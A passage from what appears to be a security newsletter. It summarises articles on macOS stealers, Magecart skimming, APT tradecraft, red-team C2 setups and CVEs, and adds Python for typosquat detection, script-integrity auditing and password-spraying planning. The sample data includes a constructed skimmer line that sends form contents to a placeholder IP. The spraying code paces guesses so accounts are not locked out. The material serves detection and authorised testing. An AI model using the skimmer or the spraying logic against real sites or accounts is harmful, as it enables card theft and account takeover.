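The names in that report follow the classic typosquat pattern: a popular package name plus a short suffix. As an added example (written for this summary, not part of the report or of any scanning tool), the Python below flags dependency names that are either within a small edit distance of a well-known package or are a well-known name with a short separator-joined suffix. The list of "popular" names and the thresholds are assumptions; in practice the list would come from registry download statistics.

```python
import re


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute and
    swap of adjacent characters each cost 1 (catches 'lodsah' vs 'lodash')."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


SEP = re.compile(r"[-_.]")


def suspicious_deps(deps, popular, max_dist=2, max_suffix=3, min_len=5):
    """Return (dependency, reason) pairs for names that look like typosquats
    of a popular package. Exact matches are fine; very short popular names are
    skipped for the distance check because they produce too much noise."""
    findings = []
    for name in deps:
        base = name.split("/")[-1]  # ignore an npm scope such as @scope/
        for pop in popular:
            if base == pop:
                continue
            reason = None
            if len(pop) >= min_len and osa_distance(base, pop) <= max_dist:
                reason = f"edit distance {osa_distance(base, pop)} from '{pop}'"
            else:
                parts = SEP.split(base, 1)
                if len(parts) == 2 and parts[0] == pop and 0 < len(parts[1]) <= max_suffix:
                    reason = f"'{pop}' plus short suffix '{parts[1]}'"
            if reason:
                findings.append((name, reason))
    return findings


# Constructed sample input: dependency names as they would appear in a
# package.json, and an assumed list of popular package names.
SAMPLE_DEPS = ["marked-ps", "marked-cs", "marked", "lodash", "expres", "react"]
POPULAR = ["marked", "lodash", "express", "react"]

if __name__ == "__main__":
    for dep, why in suspicious_deps(SAMPLE_DEPS, POPULAR):
        print(f"{dep}: {why}")
```

Run this against the dependency names in a lockfile before `npm install` rather than after; the payload in the report runs at install time, so a post-install scan is too late.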
Banshee: The Stealer That “Stole Code” From MacOS XProtect - Check Point Research discovered a new version of the Banshee macOS stealer that "stole" code from macOS XProtect. This version remained undetected for over two months, until the original version was leaked on XSS forums. The update introduced string encryption using the same algorithm as XProtect, making it difficult for antivirus engines to detect. Despite the shutdown of the Banshee operation, threat actors continue to distribute the malware through phishing websites targeting macOS users, a reminder to keep detection content current against evolving threats.
The State of Magecart: A Persistent Threat to E-Commerce Security - Magecart remains a persistent threat to e-commerce security, with cybercriminals targeting online stores to steal cardholder and personal information using methods such as skimmer code injected into checkout pages and malicious scripts embedded through third-party services like Google Tag Manager. To mitigate the risk of Magecart attacks, organizations are advised to patch vulnerabilities, disable unnecessary extensions, host scripts locally, implement Content Security Policy (CSP) and Subresource Integrity (SRI), and monitor external connections and file changes on their websites.
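Two of those mitigations, SRI and CSP, are mechanical enough to check automatically. As an added example (code written for this summary, not from the article), the Python below computes SRI `integrity` values, audits every external `<script>` in a page against the script bodies actually served (catching both a third-party script loaded without SRI and one whose content changed after it was pinned), and derives a `script-src` directive from the hosts the page legitimately loads from. The sample page, hosts and script bodies are constructed for the example.

```python
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Integrity value for an SRI attribute: '<algo>-<base64 digest>'."""
    return f"{algo}-{base64.b64encode(hashlib.new(algo, content).digest()).decode()}"


class _ScriptCollector(HTMLParser):
    """Collects the attribute dict of every <script> tag that has a src."""
    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            if a.get("src"):
                self.scripts.append(a)


def external_scripts(html_doc: str):
    p = _ScriptCollector()
    p.feed(html_doc)
    return p.scripts


def audit_scripts(html_doc: str, fetched: dict):
    """For each external script report 'ok', 'missing integrity attribute',
    'integrity mismatch' or 'no fetched copy to verify'."""
    findings = []
    for a in external_scripts(html_doc):
        src, integ = a["src"], a.get("integrity")
        body = fetched.get(src)
        if integ is None:
            findings.append((src, "missing integrity attribute"))
        elif body is None:
            findings.append((src, "no fetched copy to verify"))
        else:
            algo = integ.split("-", 1)[0]
            findings.append((src, "ok" if sri_hash(body, algo) == integ else "integrity mismatch"))
    return findings


def script_src_policy(html_doc: str) -> str:
    """A script-src directive naming only the hosts the page loads scripts from.
    It omits 'unsafe-inline', so an injected inline skimmer is blocked; allow
    legitimate inline scripts with a per-response nonce instead."""
    hosts = sorted({urlparse(a["src"]).netloc for a in external_scripts(html_doc)})
    return "script-src 'self' " + " ".join(f"https://{h}" for h in hosts)


# Constructed sample page and served script bodies (not from any real site).
APP_JS = b"window.app = {version: '1.0'};"
CHECKOUT_JS_PINNED = b"window.checkout = function () {};"
# The same file as a skimming actor would serve it from a compromised CDN:
CHECKOUT_JS_SERVED = CHECKOUT_JS_PINNED + b"\nfetch('https://203.0.113.5/c?d=' + document.forms[0].innerText);"
SAMPLE_HTML = f"""<html><body>
<script src="https://cdn.example.test/app.js" integrity="{sri_hash(APP_JS)}" crossorigin="anonymous"></script>
<script src="https://tags.example.test/gtm.js"></script>
<script src="https://cdn.example.test/checkout.js" integrity="{sri_hash(CHECKOUT_JS_PINNED)}" crossorigin="anonymous"></script>
</body></html>"""
FETCHED = {
    "https://cdn.example.test/app.js": APP_JS,
    "https://tags.example.test/gtm.js": b"/* tag manager loader */",
    "https://cdn.example.test/checkout.js": CHECKOUT_JS_SERVED,
}

if __name__ == "__main__":
    for src, verdict in audit_scripts(SAMPLE_HTML, FETCHED):
        print(f"{verdict}: {src}")
    print("Content-Security-Policy:", script_src_policy(SAMPLE_HTML))
```

SRI only helps for scripts whose content is fixed; a tag-manager loader that legitimately changes on the vendor's side cannot be pinned, which is exactly why the article recommends serving such scripts locally where possible.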
Detonating Beacons to Illuminate Detection Gaps - Elastic Security Labs used Beacon Object Files (BOFs) during their recent ON week event to improve detection engineering processes. They leveraged open-source contributions from the red team community to experiment with BOFs, Detonate Service, and the Elastic AI Assistant for Security to identify gaps and enhance detection coverage. By automating the preprocessing, submission, and analysis of BOFs, Elastic was able to validate behavior detections and develop new rules for detecting specific malicious activities. The use of BOFs poses a challenge for traditional event logging-based security solutions, highlighting the need for more advanced EDRs like Elastic Defend to detect sophisticated threats.
The Hunt for RedCurl - Recently, Huntress uncovered RedCurl, an APT group involved in cyberespionage, attacking multiple organizations in Canada. RedCurl uses unique tactics like using pcalua.exe to run Python scripts and creating reverse proxy tunnels. Huntress provides guidance on detecting and mitigating such attacks, emphasizing the importance of monitoring for anomalous behaviors and using multiple layers of defense.
Effective Phishing Campaign Targeting European Companies and Organizations - Unit 42 reports on a sophisticated phishing campaign targeting European organizations, leveraging malicious emails with fake invoices to deliver malware payloads. The attackers employed advanced social engineering tactics, including spoofing well-known brands and personalizing messages to increase credibility. The campaign utilized a combination of malicious document macros and links to distribute various payloads, such as banking trojans and information stealers.
New to Me and Miscellaneous
This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!
Password Spraying with Selenium and Fireprox - The article discusses password spraying, an attack technique that involves trying a small set of predictable passwords across likely valid user accounts to avoid account lockouts. It explains how to build wordlists, set up Fireprox for IP rotation, and create custom rules in Burp Suite for proxying traffic. The article also covers automating login attempts with Selenium and provides a Python script to do so. The methodology can be used as a guideline for performing password spraying attacks with permission.
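The security-relevant point of spraying is the lockout arithmetic: how many passwords each account can see per observation window without tripping the policy. As an added example (written for this summary; not the article's script and not doing any HTTP, IP rotation or browser automation, which is where Selenium and Fireprox come in), the Python below plans rounds from an assumed lockout threshold and window, runs them against a pluggable login function, and uses a constructed fake identity provider to show that no account accumulates more failures in one window than the plan allows.

```python
from dataclasses import dataclass, field


@dataclass
class Round:
    start_min: int                                  # minutes after the spray starts
    passwords: list = field(default_factory=list)   # tried against every user in this window


def plan_spray(passwords, lockout_threshold, window_min, safety_margin=2):
    """Split the password list into rounds so that no account sees more than
    lockout_threshold - safety_margin failures inside one observation window.
    The margin leaves room for the user's own typos during the window."""
    per_window = lockout_threshold - safety_margin
    if per_window < 1:
        raise ValueError("lockout threshold too low for the chosen safety margin")
    return [Round(k * window_min, passwords[i:i + per_window])
            for k, i in enumerate(range(0, len(passwords), per_window))]


def run_spray(users, rounds, try_login, sleep=lambda minutes: None):
    """Run the plan: one password across all users, then the next, and wait out
    the observation window between rounds. try_login(user, pw) -> bool."""
    found = {}
    for idx, rnd in enumerate(rounds):
        if idx:
            sleep(rnd.start_min - rounds[idx - 1].start_min)
        for pw in rnd.passwords:
            for user in users:
                if user not in found and try_login(user, pw):
                    found[user] = pw
    return found


# Constructed lab data: not real accounts, passwords or a real policy.
USERS = ["alice@example.test", "bob@example.test", "carol@example.test"]
PASSWORDS = ["Winter2025!", "Welcome1", "Password1", "Company123",
             "Spring2025!", "Summer2025!", "Changeme1"]
LAB_CREDS = {"bob@example.test": "Company123"}


class FakeIdp:
    """Stand-in for the login page: checks LAB_CREDS and records the time of
    every failure so the lockout exposure can be measured afterwards."""
    def __init__(self, window_min):
        self.window_min = window_min
        self.now = 0                    # simulated clock, minutes
        self.failures = {}              # user -> list of failure times

    def sleep(self, minutes):
        self.now += minutes

    def login(self, user, pw):
        if LAB_CREDS.get(user) == pw:
            return True
        self.failures.setdefault(user, []).append(self.now)
        return False

    def peak_failures(self):
        """Largest number of failures any one user accumulated inside any
        single sliding window of window_min minutes."""
        peak = 0
        for times in self.failures.values():
            for t in times:
                peak = max(peak, sum(1 for u in times if t <= u < t + self.window_min))
        return peak


if __name__ == "__main__":
    rounds = plan_spray(PASSWORDS, lockout_threshold=5, window_min=30)
    idp = FakeIdp(window_min=30)
    hits = run_spray(USERS, rounds, idp.login, idp.sleep)
    print("valid credentials:", hits)
    print("peak failures per account per window:", idp.peak_failures())
```

Before running anything like this for real, confirm the actual lockout threshold and observation window with the client; a wrong guess locks out the whole user population, which is the outcome the technique exists to avoid.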
Mastering Modern Red Teaming Infrastructure — Part 2: Building Stealthy C2 Infrastructure with Sliver and Re-director - In this post, the author discusses the importance of a secure and stealthy infrastructure for red team success. They detail building a layered setup of NGINX Proxy Manager in front of a Sliver C2 server, obfuscating network traffic, and deploying a custom C++ dropper to execute payloads. The setup uses Cloudflare for traffic proxying, NGINX as a redirector, and firewall rules to restrict access to the Sliver server. The author emphasizes operational security and anonymity while bypassing advanced network defenses.
Static Keys, Shattered Security Dreams: A CVE-2024–5764 Story - In a recent assessment, a red team discovered a vulnerability (CVE-2024-4956) in a Sonatype Nexus Repository 3 instance, allowing them to access critical files on the server. Further exploration led to the discovery of another issue, CVE-2024-5764, which exposed flaws that could allow attackers to pivot to other systems by obtaining credentials. The vulnerability relied on a static encryption key hidden within the public source code, allowing sensitive information to be decrypted. Sonatype has since addressed the vulnerability by introducing the ability to perform re-encryption of secrets in the database, but the approach still relies on static encryption keys.
Overview of WebAssembly Type Confusion in JavaScript Engines Exploitation - This article discusses the exploitation of WebAssembly type confusion in JavaScript engines, focusing on the introduction of more complex types through the WebAssembly Garbage Collection (WASMGC) extension. It explains how type comparisons between types from recursive groups in different modules can lead to type confusion. The proof of concept demonstrates how to craft a type confusion between types with different indexes by manipulating relative indexes. Lastly, it mentions Google's patch for fixing CVE-2024-6100 by checking the canonical type index when adding recursive groups.
Bringing SerenityOS to real hardware, one driver at a time - This post discusses bringing SerenityOS to real hardware, focusing on porting the OS to a Chromebook. The author encounters challenges with debugging hardware, eventually leading to successful access to the serial console. Additionally, the author works on implementing a driver for the eMMC storage on the Chromebook, facing issues related to differences between MMC and SD protocols. The post concludes with progress made in getting the graphical session partially running on the Chromebook.
The Packets Are Inside The Computer - Building 802.11 Challenges in Congested 802.11 Environments - This blog post discusses the development of an 802.11 challenge for the final Hack Fortress event at Shmoocon, focusing on the congested 802.11 environment at the conference. By using the Linux kernel's hwsim module, competitors were able to capture beacon frames, parse SSIDs, and solve challenges without broadcasting over RF. The blog details the process of building and flashing a custom OpenWRT image for not officially supported hardware and creating a challenge for competitors to solve by decoding SSIDs. The author concludes by reflecting on the fun and learning experienced while developing the challenge and participating in CTF events.
Solving NIST Password Complexities: Guidance From a GRC Perspective - TrustedSec's blog discusses aligning password policies with NIST's guidelines from a Governance, Risk, and Compliance (GRC) perspective. The post highlights that while traditional complex password requirements (e.g., special characters, frequent resets) are often enforced, NIST advocates for user-friendly practices such as longer passwords, avoiding periodic resets unless a breach occurs, and eliminating arbitrary complexity rules.